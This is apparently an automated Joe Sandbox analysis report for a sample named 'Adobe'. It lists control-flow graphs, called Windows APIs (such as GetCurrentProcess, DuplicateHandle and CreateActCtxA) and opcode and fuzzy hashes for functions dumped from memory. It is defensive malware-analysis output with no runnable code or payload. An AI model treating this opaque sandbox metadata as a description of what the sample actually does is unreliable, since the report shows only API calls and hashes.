                                                      execution_graph 15439 151d0c0 15440 151d106 GetCurrentProcess 15439->15440 15442 151d151 15440->15442 15443 151d158 GetCurrentThread 15440->15443 15442->15443 15444 151d195 GetCurrentProcess 15443->15444 15445 151d18e 15443->15445 15446 151d1cb 15444->15446 15445->15444 15447 151d1f3 GetCurrentThreadId 15446->15447 15448 151d224 15447->15448 15449 151d710 DuplicateHandle 15450 151d7a6 15449->15450 15451 151ad30 15454 151ae28 15451->15454 15452 151ad3f 15455 151ae5c 15454->15455 15457 151ae39 15454->15457 15455->15452 15456 151b060 GetModuleHandleW 15458 151b08d 15456->15458 15457->15455 15457->15456 15458->15452 15459 1514668 15460 151467a 15459->15460 15461 1514686 15460->15461 15463 1514779 15460->15463 15464 151479d 15463->15464 15468 1514878 15464->15468 15472 1514888 15464->15472 15470 1514888 15468->15470 15469 151498c 15469->15469 15470->15469 15476 15144b0 15470->15476 15474 15148af 15472->15474 15473 151498c 15473->15473 15474->15473 15475 15144b0 CreateActCtxA 15474->15475 15475->15473 15477 1515918 CreateActCtxA 15476->15477 15479 15159db 15477->15479

                                                      Executed Functions

                                                      Function 0151D0B1 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 294 151d0b1-151d14f GetCurrentProcess 298 151d151-151d157 294->298 299 151d158-151d18c GetCurrentThread 294->299 298->299 300 151d195-151d1c9 GetCurrentProcess 299->300 301 151d18e-151d194 299->301 303 151d1d2-151d1ed call 151d699 300->303 304 151d1cb-151d1d1 300->304 301->300 307 151d1f3-151d222 GetCurrentThreadId 303->307 304->303 308 151d224-151d22a 307->308 309 151d22b-151d28d 307->309 308->309
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0151D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0151D211
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 6bc1497117b8aa8f734a5f5f6efb55c6067461a7aeb4d3917f56cce9c7398868
                                                      • Instruction ID: b91d7427ee344256c2f97cc3de6b6aacaa77b57e0de5bbe164ee469d2a337dd0
                                                      • Opcode Fuzzy Hash: 6bc1497117b8aa8f734a5f5f6efb55c6067461a7aeb4d3917f56cce9c7398868
                                                      • Instruction Fuzzy Hash: E15156B09002098FEB08DFA9D548BAEBFF5FF48314F208459E119AB360D7389944CB65
                                                      Function 0151D0C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 316 151d0c0-151d14f GetCurrentProcess 320 151d151-151d157 316->320 321 151d158-151d18c GetCurrentThread 316->321 320->321 322 151d195-151d1c9 GetCurrentProcess 321->322 323 151d18e-151d194 321->323 325 151d1d2-151d1ed call 151d699 322->325 326 151d1cb-151d1d1 322->326 323->322 329 151d1f3-151d222 GetCurrentThreadId 325->329 326->325 330 151d224-151d22a 329->330 331 151d22b-151d28d 329->331 330->331
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0151D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0151D211
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 796975e8a4e72b5c752b0beeb27386147f1c366416d63845b233e529ed9dbeba
                                                      • Instruction ID: 0da78bace3ebde318e38826e393a85bb41a059ef962036146884d402afcffb15
                                                      • Opcode Fuzzy Hash: 796975e8a4e72b5c752b0beeb27386147f1c366416d63845b233e529ed9dbeba
                                                      • Instruction Fuzzy Hash: E95156B09002098FEB18DFA9D548BEEBFF5FF89314F208459E519AB360D7389844CB65
                                                      Function 0151AE28 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 361 151ae28-151ae37 362 151ae63-151ae67 361->362 363 151ae39-151ae46 call 151a14c 361->363 365 151ae69-151ae73 362->365 366 151ae7b-151aebc 362->366 368 151ae48 363->368 369 151ae5c 363->369 365->366 372 151aec9-151aed7 366->372 373 151aebe-151aec6 366->373 419 151ae4e call 151b0c0 368->419 420 151ae4e call 151b0b0 368->420 369->362 374 151aed9-151aede 372->374 375 151aefb-151aefd 372->375 373->372 377 151aee0-151aee7 call 151a158 374->377 378 151aee9 374->378 380 151af00-151af07 375->380 376 151ae54-151ae56 376->369 379 151af98-151afaf 376->379 382 151aeeb-151aef9 377->382 378->382 392 151afb1-151b010 379->392 383 151af14-151af1b 380->383 384 151af09-151af11 380->384 382->380 386 151af28-151af31 call 151a168 383->386 387 151af1d-151af25 383->387 384->383 393 151af33-151af3b 386->393 394 151af3e-151af43 386->394 387->386 412 151b012-151b058 392->412 393->394 395 151af61-151af6e 394->395 396 151af45-151af4c 394->396 403 151af91-151af97 395->403 404 151af70-151af8e 395->404 396->395 397 151af4e-151af5e call 151a178 call 151a188 396->397 397->395 404->403 414 151b060-151b08b GetModuleHandleW 412->414 415 151b05a-151b05d 412->415 416 151b094-151b0a8 414->416 417 151b08d-151b093 414->417 415->414 417->416 419->376 420->376
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0151B07E
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 66a7c0065968bc67c4acadca3a4647244409f4408aca7704fa5fc745fff528ba
                                                      • Instruction ID: fa9cbd1dceddbb9f6c37bdda9c99ab785099b311fcaf015424347ac5de140c75
                                                      • Opcode Fuzzy Hash: 66a7c0065968bc67c4acadca3a4647244409f4408aca7704fa5fc745fff528ba
                                                      • Instruction Fuzzy Hash: A07156B0A01B458FE726DF29D44075ABBF5FF88304F008A2DE49ADBA54D774E845CB90
                                                      Function 0151590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 421 151590c-1515914 422 1515918-15159d9 CreateActCtxA 421->422 424 15159e2-1515a3c 422->424 425 15159db-15159e1 422->425 432 1515a4b-1515a4f 424->432 433 1515a3e-1515a41 424->433 425->424 434 1515a51-1515a5d 432->434 435 1515a60 432->435 433->432 434->435 436 1515a61 435->436 436->436
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015159C9
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: c708dbe63afe925215fee8e48e5b6fe30a154a4b2cd93c9fc319806891eddc5e
                                                      • Instruction ID: 8f2acc0a5e7c177c3e9e7cf69a947f48d6c6e7a854cae3c49a0d508be7b3f0cb
                                                      • Opcode Fuzzy Hash: c708dbe63afe925215fee8e48e5b6fe30a154a4b2cd93c9fc319806891eddc5e
                                                      • Instruction Fuzzy Hash: 1A41E3B1C00719CBDB25DFA9C884B8DBBF5BF49304F20845AD408AB255DB756946CF91
                                                      Function 015144B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 438 15144b0-15159d9 CreateActCtxA 441 15159e2-1515a3c 438->441 442 15159db-15159e1 438->442 449 1515a4b-1515a4f 441->449 450 1515a3e-1515a41 441->450 442->441 451 1515a51-1515a5d 449->451 452 1515a60 449->452 450->449 451->452 453 1515a61 452->453 453->453
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015159C9
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 15e6872c5c10742aa9f0058e28c79f6f00cf86d87909b6d607e13f617797bbeb
                                                      • Instruction ID: badfc36e46c02483780812d99793fcf6c6f61f6fd72a4a3c00d0a0416e6ff853
                                                      • Opcode Fuzzy Hash: 15e6872c5c10742aa9f0058e28c79f6f00cf86d87909b6d607e13f617797bbeb
                                                      • Instruction Fuzzy Hash: 084114B1C0071DCBDB25CFA9C884B8DBBF5BF89304F20806AD408AB254DB755946CF90
                                                      Function 0151D710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 460 151d710-151d7a4 DuplicateHandle 461 151d7a6-151d7ac 460->461 462 151d7ad-151d7ca 460->462 461->462
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0151D797
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 8a24831b25fc3bac3783d48f8282fcd8c2403fba5cae08237a604ac4feae7043
                                                      • Instruction ID: e8bd6fd13cdc408c9714ef06c1f9c0255e6a2a1be43b2eb1503e07a9f9329d07
                                                      • Opcode Fuzzy Hash: 8a24831b25fc3bac3783d48f8282fcd8c2403fba5cae08237a604ac4feae7043
                                                      • Instruction Fuzzy Hash: 2421D5B59002499FDB10CF9AD584ADEFFF9FB48320F14841AE918A7350D378A944CFA5
                                                      Function 0151D709 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 455 151d709-151d7a4 DuplicateHandle 456 151d7a6-151d7ac 455->456 457 151d7ad-151d7ca 455->457 456->457
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0151D797
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 41bcd43d983483be0deb66db0dd0eed7d324df5e6a8b8d0b0d72bb3149ca9d7b
                                                      • Instruction ID: 0670b1572e6a360f60ce6765999e2282eb70c33bae32e487429462089b023212
                                                      • Opcode Fuzzy Hash: 41bcd43d983483be0deb66db0dd0eed7d324df5e6a8b8d0b0d72bb3149ca9d7b
                                                      • Instruction Fuzzy Hash: E321B0B59002499FDB10CFAAD585AEEBBF5FB48320F14841AE918A7350D378A944CFA4
                                                      Function 0151B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 465 151b018-151b058 466 151b060-151b08b GetModuleHandleW 465->466 467 151b05a-151b05d 465->467 468 151b094-151b0a8 466->468 469 151b08d-151b093 466->469 467->466 469->468
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0151B07E
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 130b72f407c419b0746a148700abb9147b3b018bfefd601ab5e4f69e614ca498
                                                      • Instruction ID: 5a3540dc5a65ef1c116e2da6bb70ffae4406bb1c6ebe68967d8f9135a6e16ca9
                                                      • Opcode Fuzzy Hash: 130b72f407c419b0746a148700abb9147b3b018bfefd601ab5e4f69e614ca498
                                                      • Instruction Fuzzy Hash: D811DFB6C002498FDB20DF9AC444A9EFBF4EB88314F10841AD529A7210D379A545CFA5
                                                      Function 013BD01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97a7af49f15d6dd1e90f1330c783a0b3b909640164ac736e88a315f0340a7a7e
                                                      • Instruction ID: d59d39310a7ac2785cd69375e126273b171432c716a87be436c62787ec66092c
                                                      • Opcode Fuzzy Hash: 97a7af49f15d6dd1e90f1330c783a0b3b909640164ac736e88a315f0340a7a7e
                                                      • Instruction Fuzzy Hash: DA210071604204DFCB15DFA8D9C0B26BF69FB8831CF20C569DA0A0BA56D33AD406CA61
                                                      Function 013BD1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: facd5df9647dcd373d62cea542037f13220da99b6f38bcc198d6aa310ca954e0
                                                      • Instruction ID: ce6a663b2a1b8492ff06aa39b884d96e639ae92e45d719c71a7259f6bea894d0
                                                      • Opcode Fuzzy Hash: facd5df9647dcd373d62cea542037f13220da99b6f38bcc198d6aa310ca954e0
                                                      • Instruction Fuzzy Hash: 2B21F571504244DFDB05DF98D5C0B66BB65FB8432CF20C56DDA094FA56D33AD406CB61
                                                      Function 013BD006 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7521e68b7b31e85a2a25bdaa80de6f7e5294d1d9180ea1734cfa7f49dfe2b356
                                                      • Instruction ID: 964447c042a24df5bbdab7a36b0c66d3584d9452200c8cbdadd126252c06dc7a
                                                      • Opcode Fuzzy Hash: 7521e68b7b31e85a2a25bdaa80de6f7e5294d1d9180ea1734cfa7f49dfe2b356
                                                      • Instruction Fuzzy Hash: DF2180755083809FCB03CF64D9D4B11BF71EB46218F28C5DAD9498F6A7D33A981ACB62
                                                      Function 013BD1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: 3c724a2b4dd85c01845c03df75afd157deeb9bc2fefe3d0423b5920dc778d5fc
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 0711BB75504280DFDB02CF54C5C4B15BFB1FB84228F24C6A9D9494F696C33AD40ACB62
                                                      Function 013AD745 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328166869.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_13ad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed96c1c2b6e0d1b865aee38ba6d6ea599828c241676892af181dfb92943127cd
                                                      • Instruction ID: ea2e86730c2473757b05a0d3cfb909d66c44508a796deb18e4427c7881f5b1f6
                                                      • Opcode Fuzzy Hash: ed96c1c2b6e0d1b865aee38ba6d6ea599828c241676892af181dfb92943127cd
                                                      • Instruction Fuzzy Hash: E7012B710043849AE7258F99CD84B67FFDCEF46328F58C52AED090AA96C23B9840CA71
                                                      Function 013AD744 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328166869.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_13ad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43b4febf53e59acb93906d79d154ec360ffe2bad60cf7c5d78e693f87713b5e4
                                                      • Instruction ID: 6a9710fb7abc546a3c099c75a09f95061c782c3f5de1ad1d2717389e25fb5e0b
                                                      • Opcode Fuzzy Hash: 43b4febf53e59acb93906d79d154ec360ffe2bad60cf7c5d78e693f87713b5e4
                                                      • Instruction Fuzzy Hash: 3AF062724043849EE7158E5AC888B62FFE8EF45634F18C45AED484A696C27A9844CAB5